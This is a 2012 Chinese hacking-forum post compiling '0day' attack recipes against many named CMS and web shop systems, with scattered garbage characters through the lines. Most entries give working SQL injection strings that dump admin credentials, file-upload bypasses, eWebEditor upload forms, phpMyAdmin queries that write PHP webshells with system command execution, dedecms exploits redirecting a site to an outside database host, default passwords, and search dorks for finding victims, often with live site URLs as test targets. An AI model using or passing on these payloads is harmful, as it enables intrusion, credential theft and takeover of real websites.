找回密码
 立即注册
查看: 3442|回复: 1
打印 上一主题 下一主题

0day合集

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 16:58:38 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
启航企业建站系统 cookie注入漏洞通杀所有版本
; G9 _  C) R) ]5 ^, x
$ q5 M$ _& V9 f9 J7 Y直接上exploit:) Z/ j  B, U. m0 ]: y
javascript:alert(document.cookie="id="+escape("1 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin"));
: r5 ?. S, f0 |' [test:http://www.tb11.net/system/xitong/shownews.asp?id=210
) ^& Z' n6 E2 |* n--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
1 j. F4 b2 k) zAsprain论坛 注册用户 上传图片就可拿到webshell) |% D1 }+ t) N7 X( j, P* C& z1 A3 h6 S

  }; M5 c0 U* Z% u2 RAsprain是一个适合于各中小学、中专、技校、职高建设校园论坛、师生交流论坛,一些教科研部门、公司企业建设内部论坛、IT技术爱好者建设技术交流论坛的免费论坛程序。
: C- V6 y  U/ s( i' Z% O& f4 s1.txt存放你的一句话马 如:<%execute(request("cmd"))%>
7 H/ G4 a8 H! f- r2.gif 为一小图片文件,一定要小,比如qq表情图片
! `! E" _5 M/ I+ G$ O# _$ ~, A" E3:copy /b 2.gif+1.txt 3.gif 这样就伪造了文件头,但是现在传上去还不行,我接下来就用
. K5 I9 r* e( L8 H& u4:copy /b 3.gif+2.gif 4.asp ok,现在文件头和文件尾都是正常的图片文件了; c$ k  |  l. q/ N1 ]8 b* s
5.q.asp;.gif4 s9 W, k+ m9 R6 q
google:Powered by Asprain
& U# T5 T+ Y8 V0 z( z--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
2 e: l' ?9 m; W1 Y6 I9 Q. x: e7 q9 K$ K
ShopNum1全部系统存在上传漏洞。0 Z9 Z; t" ?2 j4 U5 x3 n
3 q( G  l% Z7 e7 |% {& d
首先 在 http://www.shopnum1.com/product.html 页面查看任意产品详细说明。! `: X8 e4 `3 Z  ~. _
按说明 提示登录后台。。5 D6 u1 A" V* W& k/ U; I4 o
在后台功能页面->附件管理->附件列表
5 l5 y% H% S* W' j! c可以直接上传.aspx 后缀木马; G7 i, q' d2 [: T( M9 G
http://demo.shopnum1.com/upload/20110720083822500.aspx" \  r0 l2 p) E
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------! ?8 Q& [3 t7 X6 B. @
: f( B) v3 B( u" T" [4 p  O
牛牛CMS中小企业网站管理系统 上传漏洞; B7 r, y: M+ l# n1 ?1 h

4 K: F% ~0 ^5 L- u  z, p0 Y1 r牛牛CMS是中企商铺网专为中小企业网站开发的网站管理系统。8 G, O0 |5 @7 X& b, Q2 m
后台:admin/login.asp
4 q1 l5 c6 z8 ^( _) z7 z  L* bewebeditor 5.5 Nday
0 u+ }4 v4 O6 ]" e" X, D, d8 @5 oexp:
, ]) q  {, M% d. j2 M<form?action="http://www.lz5188.net/Admin/WebEditor168/asp/upload.asp?action=save&type=image&style=popup&cusdir=Mr.DzY.asp"?method=post?name=myform?enctype="multipart/form-data">?0 c. s6 I& W! x' o. f9 j4 a! |/ ?: D7 A
<input?type=file?name=uploadfile?size=100><br><br>?/ H1 L4 N" s) ]8 g
<input?type=submit?value=upload>?6 N- P8 o5 m7 V3 R
</form># D  B2 n7 J: D
ps:先上传小马.' O0 \: w7 `% }# d$ N' t. s
inurl:member/Register.asp 您好,欢迎来到立即注册立即登录设为首页加入收藏
  i1 o) I! R3 j! {/ b- A2 @. w  V+ ?: i
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
3 d: H& ]% P: C; d8 y
" v- V  {' }" I* FYothCMS 遍历目录漏洞  N- o! m+ M  J  x+ ~2 C: ^
2 V. o1 k1 P% H- K5 I% o, x
优斯科技企业网站管理系统(YothCMS)是一款完全开源免费的CMS。9 _& Q+ N4 N- a" E3 p$ s, o9 G
默认后台:admin/login.asp
; }# G, V7 Y. W1 n遍历目录:, z- D+ B3 f4 K, I
ewebeditor/manage/upload.asp?id=1&dir=../$ Z  s$ u# ?& v4 ^& _3 a
data:* P' q6 Q- E/ j) v
http://www.flycn.net/%23da%23ta%23\%23db_%23data%23%23.asa4 h; F6 a6 B3 G* e
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------( D8 r0 ?4 o, @; L' a
: H  _+ n. L8 \, c
Net112企业建站系统 1.0) f. y: L$ i; j$ O7 `* D- C9 B) X

, y4 N3 z- o0 u0 l5 [0 H- M" @源码简介:
5 ?) g+ b, w/ O) G7 I" C  GNet112企业建站系统,共有:新闻模块,产品模块,案例模块,下载模块,相册模块,招聘模块,自定义模块,友情链接模块 八大模块。
5 c/ A0 E; r) d0 E, G+ z添加管理员:
5 j6 b9 r' p9 v0 U. w  g( vhttp://www.0855.tv/admin/admin.asp?action=add&level=2
4 e/ H5 P$ Q) V" _8 J9 Z: f. V6 t其实加不加都不是很重要,后台文件都没怎么作验证。
4 L( Y# r# Q4 j/ Z5 y! i上传路径:; C/ A6 ?; E  |$ X3 D' o* v
http://www.0855.tv/inc/Upfile.as ... 0&ImgHeight=200% X: H2 L4 N4 @" y3 T2 v" d3 n  W
http://www.0855.tv/inc/Upfile.asp?Stype=2
0 K" J7 G$ B* @怎么利用自己研究。
6 u( l- a4 y& G- z" [% O遍历目录:
1 N& e7 y/ x/ Yhttp://www.0855.tv/admin/upfile.asp?path=../..- u1 k8 j  l* D5 D$ }9 D* Y
如:
: o4 ?. k. E1 |9 Xhttp://www.0855.tv/admin/upfile.asp?path=../admin
2 D- u$ p/ ]; K! d0 Bhttp://www.0855.tv/admin/upfile.asp?path=../data
2 N1 m& y0 U2 K% K  g) U--------------------------------------------------------------------------------------------------------------------------------------------------------------------------" X% M6 q7 J: F+ {; j/ P
8 L/ I  Y2 c7 b: z- C
易和阳光购物商城通杀 上传漏洞
7 a* y7 F7 V) |% N' F
% s9 B, `! C0 X8 v前提要求是IIS6.0+asp坏境。
3 N  X) k$ x/ u7 a漏洞文件Iheeo_upfile.asp
. M% \' [5 A% s# _! B! N1 Q过滤不严.直接可以iis6.0上传3 q% I/ u7 W! s: P
把ASP木马改成0855.asp;1.gif
% u7 O+ Q5 ~1 [" v3 ^9 P* A5 a直接放到明小子上传) ]0 t# x0 W: w; X) y. G' M
Google搜索:inurl:product.asp?Iheeoid=
( \7 C- r+ n4 J6 @! m9 S! w0 K3 b--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
% B: \- P0 l3 j
+ I6 W) a* t. I' f' t1 t: q) Cphpmyadmin后台4种拿shell方法
. j2 Y% R4 l6 B9 r* ~' D( G
9 @# `7 E- b; t# K3 d* x2 u0 K方法一:
% i4 O7 J  U# H0 oCREATE TABLE `mysql`.`xiaoma` (`xiaoma1` TEXT NOT NULL );
) g4 s# {! z$ k- m7 @9 h% y% @8 kINSERT INTO `mysql`.`xiaoma` (`xiaoma1` )VALUES ('<?php @eval($_POST[xiaoma])?>');
! W* [5 e" r  t/ _* ISELECT xiaomaFROM study INTO OUTFILE 'E:/wamp/www/7.php';
3 T9 v: @4 y0 t% k----以上同时执行,在数据库: mysql 下创建一个表名为:xiaoma,字段为xiaoma1,导出到E:/wamp/www/7.php
' e. y- V; L& M! `+ {' s) i一句话连接密码:xiaoma
4 X0 u2 I9 A' {3 ~$ D方法二:. T1 F0 R3 V! e- G3 O
Create TABLE xiaoma (xiaoma1 text NOT NULL);1 M  m& J/ A$ M! b, L1 c
Insert INTO xiaoma (xiaoma1) VALUES('<?php eval($_POST[xiaoma])?>');2 u1 U) ^* f8 G0 W
select xiaoma1 from xiaoma into outfile 'E:/wamp/www/7.php';& ?& n0 ~, O% u2 {( V+ g" Y
Drop TABLE IF EXISTS xiaoma;
. x: @" c0 N1 u+ b' S% M方法三:
1 A" c  [+ a5 W读取文件内容:    select load_file('E:/xamp/www/s.php');
5 P8 m& n; ^; ]2 T) e1 U' ~写一句话:select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/xiaoma.php'2 b6 a/ ^, q  |  x, V. T
cmd执行权限:select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php'
2 M8 h' S% P- u$ ^方法四:
6 G3 s# J3 s- ?9 k/ v, q* Z0 }& ~$ gselect load_file('E:/xamp/www/xiaoma.php');/ _6 X7 ?: Y5 B- o6 Z
select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php'
( f/ G+ J* F. I$ k然后访问网站目录:http://www.xxxx.com/xiaoma.php?cmd=dir
+ o+ F! a0 l! G& h3 G' m0 \. x2 N( G--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
3 s& R: o, d- v9 Y
3 B; G' m; h+ ~# o5 \' G6 w5 \传信网络独立开发网站源码0day漏洞
3 k# ^1 p- L/ U1 U+ H7 s" d2 N; F/ M) }1 w; K$ S
后台system/login.asp  W5 f" O( h( q3 S
进了后台有个ewebeditor! D7 C( r8 ^' a4 L* N% l
Google 搜索inurl:product1.asp?tyc=
2 ^" o4 D7 ^4 U( ?( F: `编辑器漏洞默认后台ubbcode/admin_login.asp
% z' s/ r" k; `9 n2 ^5 P数据库ubbcode/db/ewebeditor.mdb* w" S5 u& g  F' T+ u
默认账号密码yzm 111111
; q- q! _) m' B' B; E( Q. \* j2 T. Z
拿webshell方法2 P! k, s' A. @
登陆后台点击“样式管理”-选择新增样式
4 r& R0 z3 g5 R- s' \5 d样式名称:scriptkiddies 随便写
& Q$ N& k  [9 r: I# X: e& G7 U4 b路径模式:选择绝对路径 . q# s8 h' ~7 J! c
图片类型:gif|jpg|jpeg|bmpasp|asa|aaspsp|cer|cdx6 |3 t) g5 v! t. v0 x/ m7 a( r
图片类型比如就是我们要上传的ASP木马格式$ m/ P/ R/ |1 ~! m8 }
上传路径:/7 `, M9 E- ]& |
图片限制:写上1000 免的上不了我们的asp木马
; y3 J* m! |9 M7 ^上传内容不要写
- C/ ?2 G2 I. Z4 f可以提交了
5 f3 l& `9 w, Z8 p5 _0 r- v样式增加成功!
. _6 z: b- q& W; ~; ]- K返回样式管理 找到刚才添加的样式名称 然后按工具栏 在按新增工具栏 " f8 A) k4 L5 B$ Q- `6 H1 P
按钮设置 在可选按钮 选择插入图片然后按》 -然后保存设置
8 F% O+ G7 Q& D, h- O6 b网页地址栏直接输入ubbcode/Upload.asp?action=save&type=&style=scriptkiddies
$ C; l: ?# |/ {/ W上ASP木马 回车 等到路径
% f1 z; Z& q; [9 i7 C4 t. q: L
" k1 ^; Q: D3 f" o后台:system/login.asp5 [! C4 P$ k1 F  b5 P
Exp:4 K' i: g8 R4 p
and 1=2 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14,15 from master6 [# Y2 l% J- K$ `
测试:0 A2 \6 j. C# z4 H8 ]/ Z& A
http://www.zjgaoneng.com/product_show.asp?id=9 and 1=2 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14,15 from master" x2 d; L% a  V: r
http://www.yaerli.com/product_show.asp?id=245 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14 from master
3 _7 X. y% m! [9 T9 H0 l--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
# K! Y) T7 g5 d7 C
- z7 d+ Y) j) m! Jfoosun 0day 最新注入漏洞& A4 S0 n4 q& z. ?$ ~
, W" l" c  u5 y' n* ~
漏洞文件:www.xxx.com/user/SetNextOptions.asp
( h1 |7 _# K% H2 B' z2 t5 z利用简单的方法:. c5 a8 E& l/ e% D5 U
暴管理员帐号:& p3 ?* S; {, }; M7 q
http://www.i0day.com/user/SetNex ... amp;ReqSql=select+1,admin_name,3,4,5,6,7,8++from+FS_MF_Admin
9 o0 J$ q5 M: n+ x暴管理员密码:% s5 e# X2 V# n( E
http://www.i0day.com/user/SetNex ... amp;ReqSql=select+1,admin_pass_word,7 ~0 O+ n3 b) O" J4 H
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
+ y4 V3 v6 u  i8 q, V1 W6 q$ v! q' ~% [, X
网站程序的版权未知!
+ H. P5 y% R% D- s7 s4 ^  r$ l; T) r8 x0 S! A# R. \
默认网站数据库:6 _- t1 G* z9 }! [) f2 I' t
www.i0day.com/data/nxnews.mdb, k& V" x, E8 o; h# S0 f6 w
ewebeditor 在线编辑器:. p( ~. k: `! ]
编辑器数据库下载地址:www.i0day.com/ewebeditor/db/ewebeditor.mdb
' N6 X3 L4 a9 g$ V1 B5 V9 ^  f登录地址:ewebeditor/admin_login.asp
% X+ e0 ?3 `4 R5 V2 O+ `默认密码:admin  admin4 l5 Z1 }/ |7 c5 I+ V7 T2 Z
登陆后可遍历目录:ewebedtior/admin_uploadfile.asp?id=22&dir=../../data6 N5 v! i6 v( l6 U, x& X' I

5 W1 ?1 W# m* y6 n7 p3 A' mSql注入漏洞:
/ P& n& f1 n. s' w5 O6 W8 z3 Uhttp://www.i0day.com/detail.asp?id=12
5 G5 \) ?! L! O1 U8 Xexp:
2 s5 r' q/ Y% p0 Hunion select 1,admin,password,4,5,6,7,8 from admin( T9 r; u# H0 i( U9 {
爆出明文帐号/密码; e( W0 l( J6 m0 B4 o/ q7 O* N# D
) ^( T  P7 V8 E; s
上传漏洞:
& O, \% l) C  v5 b# H7 R后台+upfile.asp
9 f% z1 A6 T! T  x8 ]如:( N0 K0 @1 F- h) L; Z, g
http://www.i0day.com/manage/upfile.asp 可以用工具。如明小子。
4 L& J& B+ ?% ?- Ushell的地址:网址+后台+成功上传的马8 O, ]' y) P4 }% p2 `
google:inurl:news.asp?lanmuName=6 Y. y4 O5 V) l
------------------------------------------------------------------------------------------------------------------------------------------------------------------------" b( n8 w: |9 f7 F5 I- N8 d& t
& P& V' Q) [. j  X6 b
dedecms最新0day利用不进后台直接拿WEBSHELL
2 X9 {1 A  @: ^8 C
' y$ T- Z/ O8 l+ s% A. J拿webshell的方法如下:
- m- x! P- d7 c6 m6 P' q# Z网传的都是说要知道后台才能利用,但不用,只要 plus 目录存在,服务器能外连,就能拿shell.
' u( T2 A  M5 O2 p: M前题条件,必须准备好自己的dede数据库,然后插入数据:
* T3 N6 ^" R5 \insert into dede_mytag(aid,normbody) values(1,'{dede:php}$fp = @fopen("1.php", \'a\');@fwrite($fp, \'\');echo "OK";@fclose($fp);{/dede:php}'); 2 z, [  M$ m, Y$ z2 D' p4 n( y
& x- a8 I8 A) @% W6 P; p  M
再用下面表单提交,shell 就在同目录下 1.php。原理自己研究。。。9 m6 S1 M; A/ [+ X+ }3 S) g$ j
<form action="" method="post" name="QuickSearch" id="QuickSearch" onsubmit="addaction();">3 n6 L& g1 ^/ C
<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br /># q  ?. l8 b4 x& S7 r/ s( N+ s9 j
<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />
7 |* O7 n4 a- n0 b, W<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
, N' Q% f* D+ ]7 \/ d0 M% M<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
7 B8 V. `* k3 W" Y- T% s5 D<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />6 N. E( [4 o/ |; s
<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />
1 x: f$ a) r9 Q9 {" T<input type="text" value="true" name="nocache" style="width:400">; H* t1 A$ x6 C" X$ l2 [
<input type="submit" value="提交" name="QuickSearchBtn"><br />
5 e' i3 u$ h& I2 Q' h</form>$ w) t% @# ?$ p- ~7 s5 D8 V
<script>3 a' e0 `* c- e5 B
function addaction()/ Y7 a1 k$ R' k2 T4 @1 m4 t
{
: W% r4 ^' {) B. k6 E7 wdocument.QuickSearch.action=document.QuickSearch.doaction.value;2 A( ?2 G; K  P  Y/ b3 X
}1 z1 y( {' i: z
</script>
3 P, }3 X$ n$ z  Y6 ~-----------------------------------------------------------------------------------------------------------------------------------------------
+ E. U' a) |' C3 }% s/ i0 e! x4 `: a, F; Q$ x1 ^( n
dedecms织梦暴最新严重0day漏洞
2 W# W1 }4 `; t% @: }2 Ubug被利用步骤如下:
+ _) \& i' O, Y5 zhttp://www.2cto.com /网站后台/login.php?dopost=login&validate={dcug}&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root
, N2 T9 o5 V9 V& @7 w- ^6 S  c' L把上面{}上的字母改为当前的验证码,即可直接进入网站后台。
0 U1 y5 t# w1 D: Q$ K9 g-------------------------------------------------------------------------------------------------------------------------------------------+ p. |- k9 g. U. ^

# a/ |2 }; p: t$ X0 F& ^" V5 D多多淘宝客程序上传漏洞 ) a+ k4 N3 s6 X/ Y
漏洞页面:. @; P9 i. v- u
admin\upload_pic.php2 L0 F2 v( o: O' [4 N4 D+ Q
传送门:* J* R) M8 T3 E- z9 \! B: |1 ~1 O
http://www.www.com/admin/upload_pic.php?uploadtext=slide1) L  r- x0 y" e8 }! i
PS:copy张图片马 直接  xxx.php 上传抓包地址!8 ?8 i0 ?* h& u/ z* I. {: A
------------------------------------------------------------------------------------------------------------------------------------------------------6 j2 ?) |+ L. z+ I0 x% Y" Z* t
8 Q" g# D' w. Q+ |1 @5 r6 U
无忧公司系统ASP专业版后台上传漏洞2 M7 a! V9 H/ m5 [& m
漏洞文件 后台上传1 x2 l) x0 O* m
admin/uploadPic.asp! [. D5 f* J6 Q
漏洞利用 这个漏洞好像是雷池的
4 ?7 g0 U; t& K8 e5 O4 W' u3 ?http://forum.huc08.com/admin/upl ... ptkiddies.asp;& upload_code=ok&editImageNum=1" d/ i. C5 S' t4 n7 ], R, [
等到的webshell路径:
; M3 n: ~1 W3 c7 p: N( D& N! }7 f/UploadFiles/scriptkiddies.asp;_2.gif( z4 b$ m( L3 p2 U; P
---------------------------------------------------------------------------------------------------------------------------------------------------8 T5 |: Z) ^+ e' p4 p: g3 V0 R# P
8 e$ S1 t  T- v* z' ^
住哪酒店分销联盟系统2010
% \$ K5 M! b* e* ], E4 ^$ b& R6 gSearch:
8 {( N/ j0 y& y) j. Cinurl:index.php?m=hotelinfo$ P# N* p' l6 H$ R' @( x$ ?
http://forum.huc08.com /index.php?m=liansuohotel&cityid=53%20and%201=2%20union%20select%201,concat(username,0x3a,password),3,4,5,6,7,8,9,10%20from%20zhuna_admin
( ]# `6 W) Y2 e! p3 @# b* [默认后台:index.php?m=admin/login. E! R4 d1 U- e3 o+ x
--------------------------------------------------------------------------------------------------------------------------------------------------5 Q/ X, G1 K6 V6 F; F' q" e% i
8 ~1 }; H7 q8 u) m9 ^, C7 q
inurl:info_Print.asp?ArticleID=% ]  T% I! K3 j7 @; l
后台 ad_login.asp
* C/ @" j9 Q' N爆管理员密码:' ~' r) B5 U) m$ O8 t6 t
union select 1,2,username,password,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from admin
2 E; W$ N- ?) N. O: T* \------------------------------------------------------------------------------------------------------------------------------------------------------------
" _( I5 |1 D  r' T, Y$ G  T, o, m: ?5 b: J* b+ M/ H( z2 w4 q* ^9 w, C
搜索框漏洞!
3 A  y* i% j* [# \: A; k%' and 1=2 union select 1,admin,3,4,5,6,password,8,9,10 from admin where '%'='
  t2 K( o5 y8 U' ?7 A--------------------------------------------------------------------------------------------------------------------------------------------------------
" }) l( H) m# c9 h9 \% i) q  ]8 ^" H8 F3 k+ U
关键字:
8 z% {1 \) X% Vinurl:/reg_TemletSel.asp?step=27 }% j. c% V' {- s6 h' Q: |
或者! W* J+ g) l9 }: k+ |' e( w; i/ ]3 R
电子商务自助建站--您理想的助手- F  h0 f( y  O. w
-------------------------------------------------------------------------------------------------------------------------------------------------
- ^0 G/ s8 y' N: l( h% c8 _3 p/ {. F) f0 u% E2 J. F. v
iGiveTest 2.1.0注入漏洞& m: `" W' k9 r* ~! }
Version: <= 2.1.0
" i; H+ J3 r8 [; d( w$ r) V# Homepage: http://iGiveTest.com/
$ G0 G. m+ @$ t1 ^谷歌关键字: “Powered by iGiveTest”. P3 I4 A# o* N* z6 _0 }6 f
随便注册一个帐号。然后暴管理员帐号和密码
1 D& h. @- z; r! \http://www.xxxx.com/users.php?ac ... r=-1&userids=-1) union select 1,concat(user_name,0x3a,user_passhash),user_email,user_firstname,user_lastname,6,7 from users,groups where (1
, n/ V" x0 s/ o6 q------------------------------------------------------------------------------------------------------------------------------------------------
+ n7 K% ?  z: D1 [) g; a8 r7 G: {2 p* J/ `5 ~
CKXP网上书店注入漏洞7 x7 I' N; U' |7 ?( q
工具加表:shop_admin 加字段:admin$ X! f+ _, W0 e  _# x. C4 U
后台:admin/login.asp , S0 o* q, m/ o+ V3 z  e
登陆后访问:admin/editfile.asp?act= 直接写马.也可以直接传马:admin/upfile1.asp?path=/5 N& k3 J, s6 ?. m' v8 ^. j
inurl:book.asp 请使用域名访问本站并不代表我们赞同或者支持读者的观点。我们的立场仅限于传播更多读者感兴趣的信息: F0 F; O6 e# ^% z( r
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------3 ^7 J) z5 M4 h6 ^$ b$ l% A

7 M0 o/ ^% }# G6 r段富超个人网站系统留言本写马漏洞7 ~* c5 I( v8 y; B! j( ]
源码下载:http://www.mycodes.net/24/2149.htm& z8 h- h% h( N" z  ?& i- ~! H
addgbook.asp 提交一句话。6 Z/ {; U6 y: d: V! l
连接: http://www.xxxx.tv/date/date3f.asp
8 V+ V& D: v+ |google:为防批量,特略!
1 M& u) W7 ]7 F( u* q; X1 C) N-------------------------------------------------------------------------------------------------------------------------------------------------------------------------
' }0 g3 V, l: E  b9 L# D8 G
  i: E1 z( J  U% P智有道专业旅游系统v1.0 注入及列目录漏洞" w# _5 W8 G+ o
默认后台路径:/admin/login.asp" Z5 x6 s( q  T
默认管理员:admin) O6 {, n/ A; Z& o6 Z
默认密码:123456; s4 H- E. {  t. V/ z# }
SQL EXP Tset:
( n. v* n7 ?/ r  `% H4 xhttp://www.untnt.com/info/show.asp?id=90 union select 1,userid,3,4,5,userpsw,7,8,9,10,11,12,13,14,15 from admin7 J3 x% P! x6 x0 g2 X
------------------------------------------------------------------------------------------------------------------------------------------------------------------------
7 T" }$ o3 M% j" \
% L( b  i8 V5 Fewebeditor(PHP) Ver 3.8 本任意文件上传0day( S* F! D+ ]" l2 Y' a2 B. }$ @9 v
EXP:7 R5 t  D- l# y
<title>eWebeditoR3.8 for php任意文件上EXP</title>
8 f! H: V) Z! H6 d9 v' P0 T<form action="" method=post enctype="multip# e8 \# D  Y8 L) i' t# v' a
art/form-data"> 6 t1 X1 w' Z- U
<INPUT TYPE="hidden" name="MAX_FILE_SIZE" value="512000"> 5 J2 T3 q# q" e4 K! z; @% A
URL:<input type=text name=url value="http://www.untnt.com/ewebeditor/" size=100><br> 9 y" r2 A: P. V
<INPUT TYPE="hidden" name="aStyle[12]" value="toby57|||gray|||red|||../uploadfile/|||550|||350|||php|||swf|||gif|jpg|jpeg|bmp|||rm|mp3|wav|mid|midi|ra|avi|mpg|mpeg|asf|asx|wma|mov|||gif|jpg|jpeg|bmp|||500|||100|||100|||100|||100|||1|||1|||EDIT|||1|||0|||0|||||||||1|||0|||Office|||1|||zh-cn|||0|||500|||300|||0|||...|||FF0000|||12|||宋体||||||0|||jpg|jpeg|||300|||FFFFFF|||1">
2 G* l9 P/ L5 G. w5 j% Z2 Kfile:<input type=file name="uploadfile"><br> 0 {+ z7 K% P! m- H# u8 q
<input type=button value=submit onclick=fsubmit()>
# @, Z9 y2 S. j/ ~" u- R</form><br>
+ I) f' l' L3 C' t: e<script> 6 N" q2 D8 i, j3 }, W$ t4 t; B, X& S
function fsubmit(){   R- m0 Z4 l  Y0 \* G! ]3 W- K
form = document.forms[0];
1 g( b. I- A" Lform.action = form.url.value+''php/upload.php?action=save&type=FILE&style=toby57&language=en'';
- N; H% W* r' a5 U7 \alert(form.action); * E* @' \2 n# J( b% ?
form.submit(); . Z4 }7 j. U4 v3 x+ i, o
}
5 V+ [1 t# X/ h0 ~8 i' [) \</script>3 t4 r/ `% Y- ]" y4 D" c/ z
注意修改里面ewebeditor的名称还有路径。
6 v/ u* q' @# @( F& p  ^---------------------------------------------------------------------------------------------------------------------------------------------------------------------------
/ [6 ^3 f. {: J3 x4 Y
2 j' }' R- J3 v2 w! V6 M提交’时提示ip被记录 防注入系统的利用
+ Z8 p: R  N8 R, R! r' F网址:http://www.xxx.com/newslist.asp?id=122! S. A' e2 V& A
提示“你的操作已被记录!”等信息。) ?/ Z/ ^) _+ O0 k& ^" J( c/ Q2 k
利用方法:www.xxx.com/sqlin.asp看是否存在,存在提交http://www.xxx.com/newslist.asp?id=122‘excute(request("TNT"))写入一句话。
' o7 J! t4 R; d6 b' E" V7 o-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
" f* }4 a5 P& D; Z1 S+ p% b& k+ V8 D* A8 H) W& t
西部商务网站管理系统 批量拿shell-0day
5 O7 S  D$ Z' w" N1 n这站用的是SQL通用防注入程序 V3.0,恩,这东西可不好绕,我记得当初我有写过一个文章 通过提交一句话直接拿shell的..唯一的前提是存储记录ip的数据库必须是.asp或.asa才行..看了下sqlin.mdb
9 f& I# Q1 T9 P& ]6 }+ g- w: R1:admin_upset.asp 这个文件有个设置上传后缀的地方.. 很简单,它直接禁止了asp,asa.aspx 还有个cer可以利用嘛
( Z, k) ^; j2 W1 h- J: X2:同样是admin_upset.asp 这个文件不是入库的 他是直接在htmleditor目录生成个config.asp文件...Ok不用多说,插个一句话搞定...注意闭合4 u+ m; k& V: w; Q' K% j) J
3:admin_bakup.asp 备份数据库的..但是得本地构造...调用了filesystemobject 怎么利用就不强调了..IIS的bug大家都懂
- X2 A8 x+ D' i& C! L---------------------------------------------------------------------------------------------------------------------------------------------------------------------------- K4 p' f8 L) v0 p

" X( F) W( ?( Q1 X1 ?5 DJspRun!6.0 论坛管理后台注入漏洞  E! f5 [! H* w
$ T  o) b3 M- i$ e* a; n! z  r
SEBUG-ID:20787 发布时间:2011-04-30 影响版本:
7 r9 z2 K% e. W+ @JspRun!6.0 : j1 m9 q& g7 K2 X5 D
漏洞描述:1 }8 p6 J3 ^0 a0 V$ f
JspRun!论坛管理后台的export变量没有过滤,直接进入查询语句,导致进行后台,可以操作数据库,获取系统权限。
" b0 a8 i; b4 p' F在处理后台提交的文件中ForumManageAction.java第1940行- e4 r! C( X. l& r( I* C
String export = request.getParameter("export");//直接获取,没有安全过滤
4 T( q  o( ~! R. _! N% M3 i7 kif(export!=null){7 T( ~! |. D5 o  V- V  t
List&gt; styles=dataBaseService.executeQuery("SELECT s.name, s.templateid, t.name AS tplname, t.directory, t.copyright FROM jrun_styles s LEFT JOIN jrun_templates t ON t.templateid=s.templateid WHERE styleid='"+export+"'");//进入查询语,执行了...1 y8 n" L2 S  x6 y' q
if(styles==null||styles.size()==0){. @# p) T. Q: C
<*参考
4 K5 F- v5 F" z! Z3 c% r7 {nuanfan@gmail.com
+ B( K; l& `* M& \5 X*> SEBUG安全建议:8 B) a% U, j/ f1 z4 b/ q# G
www.jsprun.net6 ^& ^, m2 c, ^" K5 B. n/ J
(1)安全过滤变量export
: ~3 X& f" w; v' ?, R(2)在查询语句中使用占位符$ p, y" X7 I( r- c) {$ I
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
' P, L( i% p. q0 F
" l5 i8 `8 k( }! Z6 |2 X$ v4 b" [乌邦图企业网站系统 cookies 注入" I& _! v+ S; m$ Y) m

* S' m  q4 f+ a9 k% }- ~4 }程序完整登陆后台:/admin/login.asp
) \  i& |: N, c. Z& T默认登陆帐号:admin 密码:admin8889 v$ }0 C, U6 w  z! o: \
语句:(前面加个空格)
* a% `* a/ x* {) }: H* S$ [and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin4 X4 J$ M4 R: _9 d; X. d; ?3 b) @
或者是16个字段:# Y- @, ?2 |8 g5 Q: r) N1 K4 Z9 Q2 ]
and 1=2 union select 1,username,password,4,5,6,7,8,9,10,11,12,13,14,15,16 from admin
$ n0 x2 T$ b' X. k) p/ ]7 H+ k) Y. }爆不出来自己猜字段。1 e- N8 y* G, ^2 t" v- e* s
注入点:http://www.untnt.com/shownews.asp?=88
0 b' h; L$ N5 }6 Fgetshell:后台有备份,上传图片小马。备份名:a.asp 访问 xxx.com/databakup/a.asp) K6 F9 a/ m" c- W1 k/ E0 q
关键字:9 X: D8 p* Y, C+ v
inurl:shownews?asp.id=, q$ k* @8 |# Z9 _& |
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
& z' l9 `/ L. c  v: @0 m
! g7 E2 l5 M5 i& p8 [1 S7 HCKXP网上书店注入漏洞
& K; s  {! ?6 h8 u" `* L0 H% ^' }& L2 |2 u8 H
工具加表:shop_admin 加字段:admin! J" l+ |5 g! r
后台:admin/login.asp 5 G  g- F) |5 T
登陆后访问:admin/editfile.asp?act= 直接写马.也可以直接传马:admin/upfile1.asp?path=/
* r) `( k+ E0 M+ e# P5 `/ [/ b" ninurl:book.asp 请使用域名访问本站并不代表我们赞同或者支持读者的观点。我们的立场仅限于传播更多读者感兴趣的信息
; |9 \% R: y! y) s- U2 r' P$ j* U8 [---------------------------------------------------------------------------------------------------------------------------------------------------------------------------
0 p, G1 C9 E$ c6 @0 T& P; |, r
